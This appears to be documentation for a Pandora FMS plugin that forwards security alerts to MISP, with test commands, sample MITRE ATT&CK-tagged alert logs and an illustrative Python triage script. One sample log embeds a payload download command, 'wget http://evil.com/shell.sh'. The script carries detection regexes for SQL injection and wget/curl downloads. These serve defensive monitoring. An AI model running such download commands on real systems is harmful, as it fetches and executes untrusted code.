Manual Execution
Before enabling automatic integration, it is highly recommended to perform manual tests from the Pandora FMS server terminal. This allows you to verify connectivity with MISP and see how the auto-classification engine (Triage) analyzes raw logs to assign threat levels and MITRE ATT&CK tactics.
Replace https://misp.yourdomain.com and YOUR_API_KEY with the URL and API key of your own MISP instance before running the commands.
1. Public Application Exploitation (MITRE T1190)
Detects SQL Injection or XSS attempts.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Web_Server_Apache" -n "SQL Injection Attempt" \
-d "Detected attack: select * from users in login.php from IP 192.168.1.100"
2. Transfer of Malicious Tools (MITRE T1105)
Detects suspicious download commands in the terminal.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Linux_App_Server" -n "Payload Download" \
-d "Suspicious execution: wget http://evil.com/shell.sh initiated by 10.0.0.50"
3. User / Malware Execution (MITRE T1204)
Detects antivirus alerts or quarantines.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Windows_Endpoint_01" -n "Malware Infection" \
-d "Antivirus alert: malware trojan quarantined. Download source: 198.51.100.44"
4. Valid Accounts / Impossible Travel (MITRE T1078)
Detects anomalies in login attempts.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "VPN_Gateway" -n "Impossible Travel Detected" \
-d "Security alert: impossible travel VPN login from malicious IP 203.0.113.42"
5. Phishing / Spearphishing (MITRE T1566)
Classifies attacks received by email.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Mail_Exchange" -n "Malicious Email" \
-d "Email filter: malicious attachment blocked from sender with IP 203.0.113.99"
6. Brute Force (MITRE T1110)
Detects repeated failed authentication attempts.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "SSH_Server" -n "Brute Force Attack" \
-d "Raw log: Failed password for root from 192.168.1.200 port 22 ssh2"
7. Advanced Execution (Override Triage)
If you prefer to ignore the automatic classification and force your own values, use the optional parameters. In this example, we force TLP Red, threat level High (1), sharing with the community (1), a manually assigned category, and custom tags.
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
-u "https://misp.yourdomain.com" -k "YOUR_API_KEY" \
-a "Main_Firewall" -n "Custom Critical Attack" \
-d "Custom alert: denial of service from 10.10.10.10" \
-t "tlp:red" \
-s 1 \
-l 1 \
-c "Network activity" \
-g "SOC-Team, Critical-Alert, misp-galaxy:mitre-attack-pattern=\"Network Denial of Service - T1498\""
What this example does:
- -t "tlp:red": labels the event as TLP Red
- -s 1: shares the event with the MISP Community
- -l 1: forces the Threat Level to High
- -c "Network activity": categorizes the IP in this MISP category
- -g "..., misp-galaxy:mitre-attack-pattern=...": adds custom tags and the MITRE ATT&CK galaxy mapping
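The following Python script is an added illustration and is not the code of the pandora_to_misp.py plugin. It shows the kind of processing the Triage engine performs on a raw description in examples 1 to 6 (IP extraction, keyword-based mapping to a MITRE ATT&CK technique and tactic, a default threat level) and how the override parameters of example 7 replace those defaults in the resulting MISP event body. The keyword patterns, the default levels, the tlp:amber default and the helper names are assumptions. The event field names (Event, info, threat_level_id, distribution, Attribute, Tag) follow the MISP REST API event format, and the numeric meanings used (threat_level_id 1 = High, distribution 1 = This community only) match what the page states for -l 1 and -s 1.

```python
import json
import re

# Constructed, simplified triage rules for illustration only; the real plugin's
# rules are not shown on this page. Each rule maps a keyword pattern found in
# the alert description to a MITRE ATT&CK technique, its tactic, and a default
# MISP threat level (MISP threat_level_id: 1=High, 2=Medium, 3=Low, 4=Undefined).
TRIAGE_RULES = [
    (r"select \* from|union select|<script", "T1190",
     "Exploit Public-Facing Application", "Initial Access", 1),
    (r"\b(wget|curl)\b\s+https?://", "T1105",
     "Ingress Tool Transfer", "Command and Control", 2),
    (r"antivirus|malware|trojan|quarantin", "T1204",
     "User Execution", "Execution", 1),
    (r"impossible travel|anomalous login", "T1078",
     "Valid Accounts", "Initial Access", 2),
    (r"phish|malicious attachment|malicious email", "T1566",
     "Phishing", "Initial Access", 2),
    (r"failed password|brute force|authentication fail", "T1110",
     "Brute Force", "Credential Access", 3),
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_ips(text):
    """Return the unique, syntactically valid IPv4 addresses in text, in order."""
    found = []
    for ip in IPV4_RE.findall(text):
        if all(int(octet) <= 255 for octet in ip.split(".")) and ip not in found:
            found.append(ip)
    return found


def triage(description):
    """Classify a raw alert description with the first matching rule.

    Returns a dict with the technique, tactic, default threat level and the
    MISP galaxy tag in the same form the page uses; None if no rule matches.
    """
    lowered = description.lower()
    for pattern, tid, tname, tactic, level in TRIAGE_RULES:
        if re.search(pattern, lowered):
            return {
                "technique_id": tid,
                "technique": tname,
                "tactic": tactic,
                "threat_level_id": level,
                "galaxy_tag": f'misp-galaxy:mitre-attack-pattern="{tname} - {tid}"',
            }
    return None


def build_misp_event(agent, name, description, tlp="tlp:amber", distribution=0,
                     threat_level_id=None, category="Network activity", extra_tags=None):
    """Build a MISP event body from the alert, applying overrides where given.

    The keyword arguments play the role of -t, -s, -l, -c and -g: a value that
    is passed replaces the triage default, as in the override example.
    """
    verdict = triage(description)
    tags = [tlp]
    if verdict is not None:
        tags.append(verdict["galaxy_tag"])
    if threat_level_id is None:
        # 4 = Undefined is MISP's level for events nothing classified.
        threat_level_id = verdict["threat_level_id"] if verdict else 4
    tags.extend(extra_tags or [])
    return {
        "Event": {
            "info": f"[{agent}] {name}",
            "threat_level_id": str(threat_level_id),
            "distribution": str(distribution),
            "analysis": "0",  # 0 = initial analysis
            "Attribute": [
                {"type": "ip-src", "category": category, "value": ip,
                 "comment": description}
                for ip in extract_ips(description)
            ],
            "Tag": [{"name": t} for t in tags],
        }
    }


if __name__ == "__main__":
    # Automatic classification (as in example 6) and the override of example 7.
    auto = build_misp_event("SSH_Server", "Brute Force Attack",
                            "Raw log: Failed password for root from 192.168.1.200 port 22 ssh2")
    forced = build_misp_event(
        "Main_Firewall", "Custom Critical Attack",
        "Custom alert: denial of service from 10.10.10.10",
        tlp="tlp:red", distribution=1, threat_level_id=1, category="Network activity",
        extra_tags=["SOC-Team", "Critical-Alert",
                    'misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498"'])
    print(json.dumps(auto, indent=2))
    print(json.dumps(forced, indent=2))
```

Running the script prints the two event bodies: the brute-force alert is tagged with the T1110 galaxy tag and gets its level from the rule, while the denial-of-service alert matches no rule and relies entirely on the forced values, which is the situation in which the override parameters are useful.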
8. Verification
After running any command, the script prints 1 (success) or 0 (error) to the console. For details, review the plugin log:
tail -f /var/log/pandora/pandora_misp_integration.log
Finally, access your MISP web console to see the newly created event with the extracted IP and corresponding MITRE tags.
